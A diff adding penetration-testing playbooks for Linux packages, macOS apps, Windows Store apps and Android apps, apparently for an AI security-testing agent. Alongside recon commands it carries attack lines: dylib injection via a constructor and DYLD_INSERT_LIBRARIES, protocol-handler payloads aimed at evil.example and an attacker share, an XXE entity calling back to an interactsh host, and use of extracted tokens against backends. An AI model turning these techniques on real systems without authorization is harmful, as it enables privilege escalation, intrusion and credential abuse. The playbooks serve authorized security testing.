+**Insecure file/dir permissions dropped by the package.** World-writable files under root-run paths, writable directories on a daemon's `$PATH`, or writable systemd unit/`ExecStart` targets allow a local user to replace content executed as root:
+```bash
+find /tmp/pkg -perm -0002 -type f                    # world-writable files
+awk -F= '/ExecStart/{print $2}' /tmp/pkg/**/*.service # then check perms of that binary/dir
+```
+
+**setuid/setgid binaries and unsafe capabilities.** Any setuid-root binary the package installs is a LPE candidate; check it for argv/env trust, `system()`/`popen()`, relative-path `execvp`, and `LD_PRELOAD`/`PATH` reliance. `cap_setuid`, `cap_dac_override`, `cap_sys_admin` on a binary are equivalent escalations.
+
+**Writable RPATH/RUNPATH → library hijack.** If `readelf -d` shows an RPATH/RUNPATH pointing to a writable or `$ORIGIN`-relative dir, a local attacker plants a malicious `.so` loaded by a privileged process.
+
+**Bundled dependency CVEs.** Vendored/static libs with known CVEs (e.g. an old `libssl`, `libxml2`, `zlib`, `log4j`-style helper, or a pinned-vulnerable npm/pip module). `grype`/`trivy` flag the version; confirm the affected code path is actually reached, not just present.
+
+**Hardcoded secrets & default credentials.** API keys, private keys, DB passwords, or signing keys baked into binaries/config:
+```bash
+trufflehog filesystem /tmp/pkg --only-verified
+strings -n8 /tmp/pkg/usr/bin/* | grep -Ei 'BEGIN (RSA|EC|OPENSSH) PRIVATE KEY|aws_secret|xox[bp]-'
+```
+
+**Memory-safety bugs in shipped C/C++ binaries.** No-canary/no-PIE binaries using `strcpy`/`sprintf`/`gets`/format strings reachable from package-parsed input. Disassemble around the sink, then fuzz/PoC in the sandbox.
+
+**Unsigned packages / weak repo trust.** Missing or unverifiable GPG signature, or a repo served over plain HTTP, enables on-path package substitution. Verify with `dpkg-sig --verify` / `rpm -K` against an expected key.
+
+## Validation
+
+1. Reproduce the trigger in the disposable sandbox only. For maintainer scripts, install with `dpkg -i` / `rpm -i` (or invoke the script directly) under controlled input and capture the effect with a benign marker — e.g. write a timestamped file to `/root/poc-$(id -u)` to prove root-context execution; do not run destructive payloads.
+2. Confirm the UID/context: run `id` from inside the injected path, or record the owner/mode of the artifact the bug let you create.
+3. For permission/RPATH/setuid issues, demonstrate the actual hijack: drop a benign `.so`/binary in the writable location and show the privileged process loads/executes it (e.g. it creates your marker file as root).
+4. For bundled CVEs, tie the version `grype`/`trivy` reports to a concrete reachable call path (function present + invoked), not mere presence on disk.
+5. Capture exact reproduction steps, the controlling input, and a sha256 of the artifact tested.
+
+## False Positives
+
+- CVEs in libraries that are vendored but never linked/loaded, or in code paths the binary never reaches (presence ≠ reachability).
+- `grype`/`trivy` matches on a distro-backported package whose fix the vendor patched without bumping the upstream version string — check the distro changelog.
+- "World-writable" hits on files inside the extracted staging tree whose real installed mode is corrected by the maintainer script — verify post-install mode, not the archive mode.
+- Secrets that are public test fixtures, example placeholders, or already-revoked keys (`trufflehog --only-verified` reduces these).
+- setuid bits on the extracted tree that the packaging tool normalizes; confirm the bit survives a real install.
+- A `curl | sh` that pins a sha256 / fetches over HTTPS from a vendor-controlled host with signature verification is materially weaker as a finding.
+
+## Chaining & Impact
+
+- Unsafe maintainer script → arbitrary code as root at install/upgrade → **local privilege escalation / full host compromise**.
+- Writable RPATH or world-writable `ExecStart` target → library/binary hijack of a root service → **LPE**.
+- setuid binary with `system()`/`PATH` trust → **root shell** for any local user.
+- Bundled CVE in a network-facing daemon shipped by the package → **remote code execution** at the service's privilege.
+- Compromised/unsigned repo or `curl | sh` over HTTP → **supply-chain RCE** across every host that installs/updates.
+- Hardcoded cloud/API keys → pivot off-host: cloud control-plane access, registry pushes, or lateral movement into CI/CD.
+
+## Pro Tips
+
+1. Never install untrusted packages on the analysis host. Convert deb/rpm to plain files (`dpkg-deb -R`, `rpm2cpio | cpio`) and read scripts before any execution; reserve real installs for a throwaway container.
+2. Maintainer scripts run as **root** and on *upgrade* and *removal*, not just first install — review `prerm`/`postrm`/`%preun` too; removal-time bugs are commonly missed.
+3. Diff two package versions (`dpkg-deb -R` both, `diff -r`) to spot newly introduced scripts, permission changes, or silently added network fetches — fast way to catch a backdoored update.
+4. `grype`/`trivy` give you the candidate CVE; confirm reachability with `nm -D`/`objdump`/radare2 before reporting, or it is noise.
+5. AppImages and Snaps bundle an entire userland — run `trivy rootfs` on the extracted root; the real CVE surface is the vendored libs, not the launcher.
+6. `$ORIGIN` in RUNPATH plus a writable install dir is a quiet LPE; checksec/readelf surface it in one line.
+7. Seed an `interactsh-client` host into any install-time URL to catch silent telemetry or update fetches that widen the trust boundary.
+8. Prove impact with a harmless marker (timestamped file owned by root) and stop — never run destructive proof payloads, even in the sandbox.

--- a/strix/skills/desktop/macos_app.md
+++ b/strix/skills/desktop/macos_app.md
@@ -1,0 +1,164 @@
+---
+name: macos_app
+description: Security testing playbook for macOS .app/.pkg/.dmg bundles covering code signing, entitlements, hardened runtime, IPC, and Mach-O analysis
+---
+
+# macOS Application
+
+A macOS application ships as a `.app` bundle (or wrapped in `.dmg`/`.pkg`) containing a Mach-O executable, an `Info.plist`, embedded frameworks, `XPC` services, and a code signature. The attacker objective is local privilege escalation, code injection into a signed/entitled process, sandbox/TCC escape, and abuse of insecure update or IPC channels to run code with another user's or root's privileges. This sandbox is Linux/Kali, so Apple-native tooling (`codesign`, `otool`, `spctl`, `lipo`, `plutil`) is unavailable — perform static unpacking and Mach-O parsing with the cross-platform tools below, and reserve native commands for an on-host macOS verification step where the engagement allows it.
+
+## Attack Surface
+
+**Bundle layout** (`Target.app/Contents/`)
+- `MacOS/<exe>` main Mach-O; `Frameworks/` embedded dylibs/frameworks; `Resources/`; `Info.plist`
+- `_CodeSignature/CodeResources`, embedded `Code Signing Requirements`, provisioning profile
+- `XPCServices/*.xpc`, `Library/LaunchServices/*` privileged helpers, `Library/LoginItems`
+
+**Trust & policy**
+- Code signature validity, signer identity, Designated Requirement (DR), notarization ticket
+- Hardened Runtime flag and runtime exception entitlements (`allow-dyld-environment-variables`, `disable-library-validation`, `allow-unsigned-executable-memory`)
+- Entitlements: `com.apple.security.app-sandbox`, `get-task-allow`, TCC grants, keychain access groups
+
+**IPC / privileged surfaces**
+- Mach services (`NSXPCConnection`, `xpc_connection_create_mach_service`), distributed notifications
+- `SMJobBless`/`SMAppService` LaunchDaemon helpers running as root
+- Custom URL schemes (`CFBundleURLTypes`), document/UTI handlers, AppleScript/`NSUserScriptTask`
+- Auto-update channels (Sparkle, custom), bundled CLI tools, `setuid` binaries
+
+## Recon & Enumeration
+
+Acquire and unpack the artifact (handles `.dmg`/`.pkg`/`.app` from Linux):
+
+```bash
+# DMG (HFS+/APFS) extraction without macOS
+sudo apt-get install -y dmg2img p7zip-full xar-utils cpio
+dmg2img Target.dmg Target.img && 7z x Target.img -oTarget_extracted
+# Flat .pkg = xar archive of payload cpio.gz
+xar -xf Target.pkg -C pkg_out && (cd pkg_out && for p in $(find . -name Payload); do cat "$p" | gunzip -dc | cpio -id; done)
+# .app is just a directory tree
+find Target.app -type f | sort
+```
+
+Parse Mach-O, signatures, entitlements, and load commands without `otool`:
+
+```bash
+pip install macholib lief
+# Architectures, load commands, dylibs, rpaths
+python3 - <<'PY'
+import lief; b=lief.MachO.parse("Target.app/Contents/MacOS/Target")
+for m in b:
+    print("arch",m.header.cpu_type)
+    print("rpaths",[c.path for c in m.commands if c.command==lief.MachO.LOAD_COMMAND_TYPES.RPATH])
+    print("dylibs",[d.name for d in m.libraries])
+    print("hardened/flags",m.header.flags)
+    cs=m.code_signature; print("has_codesig", cs is not None)
+PY
+# Entitlements live in the embedded __TEXT.__entitlements blob / code-sign superblob
+strings -a Target.app/Contents/MacOS/Target | grep -iE 'com.apple.security|get-task-allow|disable-library-validation|allow-dyld'
+r2 -qc 'iE; ic~entitlement; i~signature' Target.app/Contents/MacOS/Target 2>/dev/null
+```
+
+Plist, secrets, and supply-chain scans (install asset-specific tooling):
+
+```bash
+# Plists may be binary — convert with a portable parser
+python3 -c 'import plistlib,sys;print(plistlib.load(open(sys.argv[1],"rb")))' Target.app/Contents/Info.plist
+# Secrets / hardcoded creds across the bundle
+curl -sL https://github.com/trufflesecurity/trufflehog/releases/latest/download/trufflehog_linux_amd64.tar.gz | tar xz -C /usr/local/bin trufflehog
+trufflehog filesystem Target.app --results=verified,unknown
+GO111MODULE=on go install github.com/gitleaks/gitleaks/v8@latest && gitleaks dir Target.app -v
+# SAST on bundled scripts (sh, py, JXA, Electron JS)
+pip install semgrep && semgrep --config auto Target.app
+# SBOM + CVE on embedded frameworks/dylibs
+syft Target.app -o cyclonedx-json=sbom.json && grype sbom:sbom.json
+trivy fs --scanners vuln,secret,misconfig Target.app
+```
+
+On-host macOS verification (run only on an authorized macOS box):
+
+```bash
+codesign -dvvv --entitlements :- Target.app          # signer, DR, entitlements
+codesign --verify --deep --strict --verbose=4 Target.app
+spctl -a -vvv -t exec Target.app                     # Gatekeeper/notarization
+otool -L Target.app/Contents/MacOS/Target; otool -l ... | grep -A2 LC_RPATH
+```
+
+## Methodology
+
+1. **Acquire & verify provenance**: unpack the `.dmg`/`.pkg`, record SHA-256, identify the signer Team ID and whether the package is notarized. Compare against the vendor's published identity.
+2. **Map the bundle**: enumerate the main Mach-O, embedded frameworks, XPC services, helper tools, login items, and any bundled scripts or interpreters (Electron/Python/JXA).
+3. **Dump entitlements & runtime flags**: extract the entitlements blob and Mach-O header flags; flag hardened-runtime exceptions (`disable-library-validation`, `allow-dyld-environment-variables`, `get-task-allow`) and broad TCC grants.
+4. **Assess signature integrity**: check whether resources are sealed, whether nested code is signed, and whether the Designated Requirement pins the Team ID (weak DR = forgeable identity).
+5. **Analyze dynamic loading**: resolve `@rpath`/`@executable_path`/`@loader_path` search order and confirm whether Library Validation is enforced (the prerequisite for dylib hijacking/injection).
+6. **Enumerate IPC**: list Mach service names, XPC listeners, and privileged helpers; check connection authorization (audit token / DR validation vs. PID-based checks).
+7. **Test the update channel**: capture the updater's network traffic; verify HTTPS, signature/EdDSA verification of the downloaded payload, and appcast integrity.
+8. **Validate, chain, report**: build a minimal PoC for each confirmed weakness; chain into privilege escalation or TCC/sandbox escape; document signer, entitlements, and exact reproduction.
+
+## Key Weaknesses / Techniques
+
+**Dylib hijacking / injection (no Library Validation)** — If `disable-library-validation` is set or the binary is unsigned, a writable `@rpath`/`@loader_path` directory lets you drop a malicious dylib that loads into the trusted process.
+```bash
+# Resolve search order, then find a load path that is writable / missing on disk
+python3 -c 'import lief;b=lief.MachO.parse("Target.app/Contents/MacOS/Target")[0];print([c.path for c in b.commands if "RPATH" in str(c.command)])'
+# A hijack dylib needs a constructor; build/sign on macOS, place in the first writable rpath dir
+# __attribute__((constructor)) static void run(){ system("id > /tmp/poc"); }
+```
+
+**DYLD environment injection** — With `com.apple.security.cs.allow-dyld-environment-variables` (and no hardened runtime), `DYLD_INSERT_LIBRARIES` forces an arbitrary dylib into the process:
+```bash
+DYLD_INSERT_LIBRARIES=/tmp/poc.dylib /Applications/Target.app/Contents/MacOS/Target
+```
+
+**Insecure privileged helper (SMJobBless/SMAppService)** — A root LaunchDaemon that authorizes clients by PID or bundle path (not the audit token + DR) lets an unprivileged process invoke its privileged XPC methods. Inspect the helper's `SMAuthorizedClients` requirement and its connection handler; absence of `[connection setCodeSigningRequirement:]` / `xpc_connection_set_peer_code_signing_requirement` is the bug.
+
+**Weak Designated Requirement / unsealed resources** — If the DR does not pin Team ID + identifier, a re-signed forgery satisfies it. If `Resources/` scripts or frameworks are not sealed in `CodeResources`, you can swap content post-signing without invalidating the signature in practice.
+
+**Custom URL scheme / document handler abuse** — A registered scheme that maps untrusted input to a privileged action (file open, command, deeplink to internal API) enables drive-by invocation:
+```bash
+# Inspect CFBundleURLTypes / CFBundleDocumentTypes, then trigger from a webpage: location='target://...'
+python3 -c 'import plistlib;d=plistlib.load(open("Target.app/Contents/Info.plist","rb"));print(d.get("CFBundleURLTypes"),d.get("CFBundleDocumentTypes"))'
+```
+
+**Insecure auto-update** — Plaintext HTTP appcast, missing EdDSA/DSA signature check, or downgrade-able feed (classic CVE-2016-9892 Sparkle class). Confirm the feed URL scheme and whether the downloaded archive is signature-verified before execution.
+
+**TCC / sandbox over-grant** — Broad entitlements (`com.apple.security.automation.apple-events`, full-disk-equivalent temporary exceptions, `com.apple.security.cs.allow-jit`) widen blast radius. Map each entitlement to the capability it unlocks.
+
+**Hardcoded secrets / embedded creds** — API keys, signing material, or backend tokens in `Resources/`, plists, or the Mach-O `__cstring` section (catch via trufflehog/gitleaks above).
+
+## Validation
+
+1. **Signature claim**: on macOS, `codesign --verify --deep --strict` must fail after your modification (or the unmodified app must fail to confirm tampering acceptance). On Linux, show the sealed-resource hash in `CodeResources` does not cover the file you swapped.
+2. **Injection**: run the target with your PoC dylib and show out-of-band evidence the code executed inside the trusted process (e.g., a file written as the app's user, or a beacon to `interactsh-client` from the app's context — not your shell's).
+3. **Privileged helper**: from an unprivileged process, invoke the helper's XPC method and demonstrate a root-owned side effect (`ls -l /tmp/poc` shows `root`), with the client doing nothing privileged itself.
+4. **Update**: intercept the feed (mitmproxy), serve a benign re-packaged update, and show it installs/launches without a signature rejection.
+5. Capture exact entitlements, Team ID, load command paths, and a minimal reproduction script for every finding.
+
+## False Positives
+
+- `disable-library-validation` present but the bundle is still fully sandboxed and has no writable rpath directory — not exploitable in isolation.
+- `get-task-allow` true only in a **debug/development** build that never ships; verify it is absent from the release/notarized artifact.
+- Unsigned helper that is only reachable by root anyway (no privilege boundary crossed).
+- "Secrets" that are public client identifiers (OAuth public client IDs, Sentry DSNs) — not credentials.
+- Grype/Trivy CVEs on a statically-linked or patched fork where the vulnerable code path is not built in — confirm the symbol/version actually present.
+- HTTP appcast that nonetheless EdDSA-verifies the payload before execution — transport is cosmetic, integrity holds.
+- Custom URL scheme that only routes to inert UI navigation with no privileged sink.
+
+## Chaining & Impact
+
+- Dylib hijack into an app holding **Full Disk Access** or Automation TCC grants → read protected files / drive other apps → TCC bypass without a prompt.
+- Writable rpath + auto-launched login item → persistence that re-injects on every login.
+- Unauthenticated privileged helper → arbitrary command execution as **root** → full local privilege escalation.
+- Insecure update + MITM (rogue Wi-Fi/ARP) → remote code execution at install privilege, often root.
+- Forgeable DR + unsealed resources → trojanized "trusted" app that passes Gatekeeper on the victim's first run.
+- Hardcoded backend token → pivot from local app to cloud/API compromise.
+
+## Pro Tips
+
+1. The entitlements that matter most for injection are `disable-library-validation`, `allow-dyld-environment-variables`, and `allow-unsigned-executable-memory` — grep for them first; their presence reorders your whole attack plan.
+2. PID-based XPC authorization is always a bug: PIDs are reusable/forgeable. Real checks use the audit token plus a code-signing requirement — confirm which one the handler uses.
+3. `@loader_path` and `@executable_path` differ from `@rpath`; resolve them relative to the *loading* binary, not the main executable, or you will chase a non-writable directory.
+4. Binary plists fail `cat`/`grep` — always normalize with `plistlib`/`plutil -convert xml1` before reading; many "no entitlements" conclusions are just unconverted binary blobs.
+5. Notarization proves Apple scanned it, not that it is safe or that *your* tampered copy is trusted — re-verify the signature after every modification.
+6. Electron and Python apps hide the real logic in `app.asar` / `__pycache__`/`site-packages` inside `Resources/` — unpack `asar` and decompile `.pyc`; that is where secrets and IPC handlers usually live.
+7. Helper tools in `Library/LaunchServices` and the `SMAuthorizedClients`/`SMPrivilegedExecutables` plist keys reveal the trust relationship between app and helper — read both ends before testing the channel.
+8. Reserve `codesign`/`spctl`/`otool` for an authorized macOS verification pass; do the heavy static unpacking and triage on this Linux sandbox with `lief`/`r2`/`xar`/`dmg2img` to keep iteration fast.

--- a/strix/skills/desktop/windows_store_app.md
+++ b/strix/skills/desktop/windows_store_app.md
@@ -1,0 +1,165 @@
+---
+name: windows_store_app
+description: MSIX/APPX Windows Store app assessment covering package teardown, protocol/IPC abuse, secret recovery, and update-channel attacks
+---
+
+# Windows Microsoft Store App (MSIX/APPX)
+
+A Microsoft Store identifier resolves to a packaged Windows application shipped as MSIX/APPX (or the .msixbundle/.appxbundle multi-arch container). The package is a signed ZIP carrying the app payload, an `AppxManifest.xml`, an `AppxBlockMap.xml`, and a `AppxSignature.p7x`. The attacker objective is to acquire the package off the Store, unpack it, and assess the binaries, manifest-declared entry points (protocol handlers, file associations, app services, full-trust launchers), embedded secrets, and the network/update backends it talks to — turning a client-side install into auth bypass, local privilege escalation, RCE, or backend compromise. Treat the MSIX as a redistributable artifact you fully control: everything inside ships to every user, so anything sensitive there is already disclosed.
+
+## Attack Surface
+
+**Package container**
+- `AppxManifest.xml` — declared `Capability`/`DeviceCapability`, `Extensions` (protocol handlers, file type associations, `windows.appService`, `desktop:FullTrustProcess`, `startupTask`, COM servers, `appExecutionAlias`), `Identity` (publisher, version), `TargetDeviceFamily`
+- Payload binaries — managed (.NET / C#, UWP), native (C++/WinRT), or packaged Win32/Electron/React-Native-Windows
+- `AppxBlockMap.xml` + `AppxSignature.p7x` — integrity and signing chain
+- Bundled assets, config JSON/XML, `.pri` resource indexes, sqlite DBs, ML models, embedded web content (WebView2/WinUI)
+
+**Runtime entry points (attacker-reachable from another low-priv app or the web)**
+- Custom URI protocol activation (`myapp://...`) reachable from a browser/HTML
+- App Services (`windows.appService`) callable cross-process by other packages
+- File Type Associations — opening a crafted file triggers the app's parser
+- Full-trust companion process / `runFullTrust` capability bridging UWP sandbox to Win32
+- `appExecutionAlias` (a PATH-resolvable exe stub), COM/OLE servers, share/contact targets
+
+**Network & platform backends**
+- REST/GraphQL/gRPC APIs the app authenticates to (often with bearer tokens or API keys)
+- OAuth/MSAL/AAD flows, license/entitlement and IAP validation endpoints
+- Auto-update / delta-download channels and CDN package mirrors
+- Local IPC: named pipes, loopback HTTP servers, WebView2 message bridges, `localStorage`/IndexedDB
+
+**Local data at rest**
+- `%LOCALAPPDATA%\Packages\<PackageFamilyName>\LocalState`, `Settings\settings.dat` (registry hive), `RoamingState`, `LocalCache`
+- DPAPI/Credential Locker (`PasswordVault`) blobs, cached tokens, sqlite caches
+
+## Recon & Enumeration
+
+Acquire the package first, then statically and dynamically assess it.
+
+**Acquire the MSIX/APPX**
+- From a Windows box with the app installed: `Get-AppxPackage *vendor* | Select InstallLocation` then copy the folder, or `Add-AppxPackage` history.
+- Re-package an installed app's payload: `makeappx pack /d "<InstallLocation>" /p out.msix` (Windows SDK).
+- From the Store without installing: resolve the ProductId and pull the download URL via the public delivery endpoint `https://store.rg-adguard.net` (paste the Store URL / ProductId) or `winget download --id <Publisher.App> --download-directory ./pkg` (winget 1.6+ supports offline download). Save the `.msix`/`.msixbundle`.
+- Side-load source for inspection only; never distribute.
+
+**Unpack (works cross-platform — MSIX is a ZIP)**
+```
+unzip -o app.msix -d app_unpacked            # bundles: unzip the .msixbundle first, then inner .msix
+makeappx unpack /p app.msix /d app_unpacked  # on Windows, preserves footprint
+xmllint --format app_unpacked/AppxManifest.xml | less
+```
+
+**Triage binaries**
+- .NET / UWP managed: decompile with ILSpy / `ilspycmd -o decomp app_unpacked/App.dll` or dnSpy; install: `dotnet tool install -g ilspycmd`.
+- Native PE: `binwalk app_unpacked/*.exe`; strings/imports via `rabin2 -zI file.exe` (radare2) or Ghidra (`apt install -y ghidra` / snap). Install binwalk: `pipx install binwalk` or `apt install -y binwalk`.
+- Electron/React-Native: extract `app.asar` with `npx @electron/asar extract app.asar src/` then read JS; check `webContents`/`nodeIntegration`.
+- SBOM + known-vuln deps: `syft dir:app_unpacked -o cyclonedx-json > sbom.json` then `grype sbom:sbom.json`. Install: `curl -sSfL get.anchore.io/syft | sh` and `.../grype | sh`. Also `trivy fs app_unpacked`.
+
+**Hunt secrets**
+- `trufflehog filesystem app_unpacked --only-verified` and `gitleaks dir app_unpacked -v`.
+- `grep -rIEn '(api[_-]?key|secret|client_secret|password|bearer|AKIA[0-9A-Z]{16}|AIza[0-9A-Za-z_-]{35})' app_unpacked`.
+- Decode any embedded JWTs/tokens: `jwt_tool <token>` to read claims and check `alg`/exp.
+
+**Map manifest entry points & backends**
+- Pull every `<Extension>`, `<uap:Protocol>`, `<uap:FileTypeAssociation>`, `desktop:FullTrustProcess`, `windows.appService`, `appExecutionAlias` from `AppxManifest.xml`.
+- Enumerate endpoints the binaries call: `grep -rIoE 'https?://[a-zA-Z0-9./_-]+' app_unpacked | sort -u`, then resolve and scan hosts:
+```
+echo api.vendor.example | dnsx -a -resp | tee hosts.txt
+subfinder -d vendor.example -silent | httpx -silent -title -tech-detect -o live.txt
+naabu -host api.vendor.example -top-ports 1000 -silent
+nuclei -l live.txt -as -s critical,high -rl 50 -c 20 -bs 20 -timeout 10 -retries 1 -j -o nuclei.jsonl
+```
+- Source-grep static analysis on decompiled/JS sources: `semgrep --config p/security-audit --config p/secrets decomp/`.
+
+**Dynamic (Windows VM)**
+- Process Monitor + Process Explorer to watch file/registry/named-pipe/network activity at launch.
+- mitmproxy/Burp with the cert trusted in the user store; note UWP loopback isolation (`CheckNetIsolation LoopbackExempt -a -n=<PackageFamilyName>` to allow proxying loopback during authorized testing).
+- For .NET, attach dnSpy at runtime; for native, x64dbg/Frida (`pip install frida-tools`; `frida-trace`).
+
+## Methodology
+
+1. Acquire the exact shipping package (`.msix`/`.msixbundle`) and record `Identity` name, publisher, version from the manifest.
+2. Verify the signing chain: confirm `AppxSignature.p7x` validates and the publisher CN matches `Identity@Publisher`; note self-signed vs CA-issued. A mismatch enables repackaging/spoofing.
+3. Unpack and inventory: list all binaries, config files, embedded web content, DBs, and the full set of manifest `Extensions`/`Capabilities`.
+4. Static-assess each entry point in priority order: protocol handlers → file associations → app services → full-trust bridge → COM/aliases. For each, find the handler in code and trace how attacker-controlled input flows.
+5. Recover secrets and credentials from the payload and config; classify each (live API key, signing key, OAuth client secret, hardcoded creds).
+6. Build the backend map from hardcoded URLs; recon and scan those hosts/APIs with the acquired tokens (authorized scope only).
+7. Stand up the Windows VM, install, and observe runtime: intercept TLS, dump named pipes/loopback servers, read `settings.dat` and LocalState after exercising features.
+8. Validate the highest-impact candidates with a PoC (crafted protocol URL, malicious associated file, API call with extracted key, update tamper).
+9. Assess local data protection (DPAPI usage, token storage) and update-channel integrity.
+10. Document client-side-trust assumptions broken and chain client findings into backend impact.
+
+## Key Weaknesses / Techniques
+
+**Hardcoded secrets / over-privileged keys**
+- Shipping live API keys, cloud creds, or OAuth client secrets in the payload. Extract, then exercise scope:
+  `curl -s https://api.vendor.example/v1/me -H "Authorization: Bearer <token_from_package>"`. Check whether the key is account-scoped vs admin/service-scoped.
+
+**Insecure custom protocol handler**
+- Handler passes the activation URI into a command, file path, deep-link router, or WebView without validation. From a web page or another app:
+  `start "" "myapp://open?file=\\attacker\share\x"` or `myapp://action?url=https://evil.example/payload`.
+- Test path traversal (`myapp://load?path=..\..\..\Windows\System32\...`), argument injection into a spawned full-trust process, and SSRF/open-redirect when the URI feeds an outbound fetch. Confirm exfil with `interactsh-client` (embed the `*.oast.fun` host in the URI and watch for the callback).
+
+**File Type Association parser bugs**
+- Opening a crafted associated file reaches a native/managed parser. Fuzz the format and check for memory corruption (native) or deserialization/XXE (managed). For XML-backed formats, test classic XXE:
+  `<!DOCTYPE x [<!ENTITY e SYSTEM "http://<interactsh-host>/x">]> <root>&e;</root>`.
+
+**App Service / IPC trusting the caller**
+- `windows.appService` and named pipes reachable by any local package. Enumerate the pipe, then send unauthorized commands; look for privileged actions exposed without caller identity checks (`GetCallerPackageFamilyName` absent). A loopback HTTP control server with no auth is the same bug class — `curl http://127.0.0.1:<port>/admin`.
+
+**Full-trust bridge / LPE**
+- UWP app launching a `desktop:FullTrustProcess` or `runFullTrust` companion. If the UWP side passes unsanitized input (a file path, URL, or command fragment) to the full-trust process, a low-priv attacker who can drive the UWP surface escalates outside the sandbox. Trace the `FullTrustProcessLauncher.LaunchFullTrustProcessForCurrentAppAsync` arguments.
+
+**Insecure update channel**
+- Updates fetched over HTTP, or HTTPS without signature/hash pinning beyond TLS. Test downgrade and substitution: MITM the update manifest, serve a tampered package, confirm the app installs/executes it. MSIX install requires a valid signature, but companion full-trust auto-updaters often skip this.
+
+**WebView2 / Electron RCE surface**
+- `nodeIntegration: true`, missing `contextIsolation`, or `AddHostObjectToScript`/`postMessage` bridges that expose native functions to loaded web content. If any attacker-influenced URL or content renders, XSS becomes native code execution. Check CSP and the `WebMessageReceived` handlers.
+
+**Weak local data protection**
+- Tokens/secrets written to `LocalState`/`settings.dat` in plaintext or with reversible encoding instead of DPAPI/`PasswordVault`. Read them post-login and confirm they are usable from another machine (true secret leak) vs DPAPI-bound (machine/user-tied).
+
+**Client-side license / entitlement / IAP bypass**
+- Premium gating or IAP validated only in-client. Patch the check (dnSpy IL edit), or replay/forge the license response, to confirm server does not re-verify.
+
+## Validation
+
+- Build a minimal, reproducible PoC and capture before/after evidence.
+- Protocol/FTA bugs: a saved `.html` with the `myapp://` link (or the crafted file) that, on a clean install, demonstrably executes the unintended action — screenshot/Process Monitor trace showing the spawned process, file read, or callback.
+- Hardcoded-key/backend bugs: an authenticated API request using only artifacts extracted from the package, returning data the unauthenticated/lower-priv user should not see. Redact secret values in the report; prove scope, not just existence.
+- IPC/full-trust bugs: a standalone low-priv client (or second package) issuing the privileged action and the high-priv side performing it; capture the `whoami`/integrity-level delta for LPE.
+- Update bugs: a captured request/response showing the tampered package being accepted, executed in a VM snapshot.
+- Always note: package version, file paths inside the package, exact handler/function name, and the trust boundary crossed.
+
+## False Positives
+
+- Strings that look like keys but are placeholders, test/sandbox creds, or public client IDs (public OAuth client IDs are not secrets by design — confirm a matching secret or that the flow is confidential).
+- DPAPI/`PasswordVault`-protected blobs flagged as "plaintext secrets": they are bound to the user/machine and not portable — verify they cannot be used off-box before reporting.
+- Protocol handlers that validate/canonicalize input or only operate within the package container — no boundary crossed.
+- App Services that enforce caller package-family allowlists — IPC reachable but authorized.
+- "HTTP" URLs that are localhost loopback only, or upgraded to HTTPS at runtime.
+- Secret scanners firing on third-party SDK sample keys, source maps, or vendored test fixtures.
+- License checks that are also enforced server-side (client patch yields a server 403) — not a bypass.
+- Self-signed signature on a sideload/dev build that ships CA-signed in the Store.
+
+## Chaining & Impact
+
+- Hardcoded service key → backend API takeover → other users' data → full account/tenant compromise.
+- Protocol handler injection (from a web page) → argument injection into full-trust companion → RCE / LPE on every install.
+- File association parser bug → memory corruption → code execution by sending a victim one document.
+- App Service / named-pipe trust flaw → low-priv local app drives privileged action → sandbox escape and LPE.
+- WebView2 XSS + exposed host object → native code execution within the app's privileges.
+- Insecure update channel → MITM serves tampered companion binary → mass RCE across the user base (supply-chain-style).
+- Portable plaintext token in LocalState → reuse on attacker machine → account takeover without the victim's device.
+
+## Pro Tips
+
+- MSIX is just a signed ZIP — `unzip` it anywhere; you do not need Windows to read the manifest, decompile .NET, or pull `app.asar`. Reserve the VM for dynamic confirmation.
+- The manifest is the map: every `Extension` is a remotely- or locally-reachable entry point. Enumerate them before touching binaries so you assess attacker-reachable code first.
+- `.msixbundle`/`.appxbundle` are containers of per-arch `.msix` — unzip the outer bundle, pick the `x64` inner package, then unzip that.
+- Anything in the package ships to everyone: a "hidden" admin key or debug endpoint in the payload is already public. Prioritize secret hunting early.
+- `settings.dat` is a registry hive — load it with a hive parser (or `reg load` on Windows) rather than grepping the binary.
+- UWP loopback isolation blocks proxying by default; the temporary `LoopbackExempt` registration is essential to intercept the app's own localhost traffic during authorized testing — revert it after.
+- Full-trust companion processes are the usual sandbox-escape pivot; always check whether the UWP front-end can influence their command line or working file.
+- Decompiled .NET names map cleanly to manifest handlers — search the decompiled tree for the protocol scheme string and the `OnActivated`/`Run` (IBackgroundTask) overrides to land on the handler fast.
+- Re-pack and self-sign your modified build only in your own VM to validate client-side bypasses; never distribute a resigned package.

--- a/strix/skills/mobile/android_play_store.md
+++ b/strix/skills/mobile/android_play_store.md
@@ -1,0 +1,168 @@
+---
+name: android_play_store
+description: Pull an APK/AAB from Google Play and assess the Android app for client-side trust, hardcoded secrets, exported component, and network/backend weaknesses.
+---
+
+# Android Play Store App
+
+The asset is a public Google Play listing identified by its package name (e.g. `com.example.app`). The attacker's objective is to obtain the shipped artifact (APK/AAB), reverse it, and treat the binary as untrusted attacker-controlled code: extract embedded credentials and backend endpoints, abuse exported components, bypass client-side controls (auth, root/SSL pinning, license/IAP checks), and pivot to the server-side APIs and cloud backends the app talks to. The app is distributed code you fully control on a device you own — every check, key, and endpoint inside it is in scope.
+
+## Attack Surface
+
+**The artifact**
+- Single APK, split APKs (base + config.* + DPI/abi splits), or AAB → universal APK
+- `AndroidManifest.xml`: exported `activity`/`service`/`receiver`/`provider`, `intent-filter`, deep links, `permission`, `android:debuggable`, `usesCleartextTraffic`, `networkSecurityConfig`
+- DEX/Smali code, native `.so` libraries (JNI), Flutter/React Native/Unity bundles
+- `assets/`, `res/raw/`, `res/values/strings.xml`, `resources.arsc` for embedded data
+- `META-INF/` signing block (v1/v2/v3), certificate identity
+
+**Inter-process surface (on-device)**
+- Exported Activities (forced navigation, intent redirection), Services, BroadcastReceivers
+- ContentProviders (path traversal, SQLi, exported read/write)
+- Deep links / App Links (`scheme://`, `https://` autoVerify) and WebView `intent://` / `javascript:` bridges
+- `addJavascriptInterface` exposed objects; `setAllowFileAccess`/`setAllowUniversalAccessFromFileURLs`
+
+**Backend surface (off-device)**
+- REST/GraphQL/gRPC endpoints baked into the app, API keys, OAuth client secrets
+- Firebase (Firestore/RTDB/Storage/Functions), AWS Amplify/Cognito, GCP/Azure SDK config
+- Third-party SDK keys (Stripe, Mapbox, Algolia, Twilio, Sentry, push/FCM)
+
+## Recon & Enumeration
+
+Install the asset-specific toolchain (Kali sandbox):
+```
+apt-get install -y apktool jadx dex2jar default-jdk android-sdk-build-tools  # apktool/jadx, keytool, apksigner, aapt2
+pip install frida-tools objection androguard apkid quark-engine
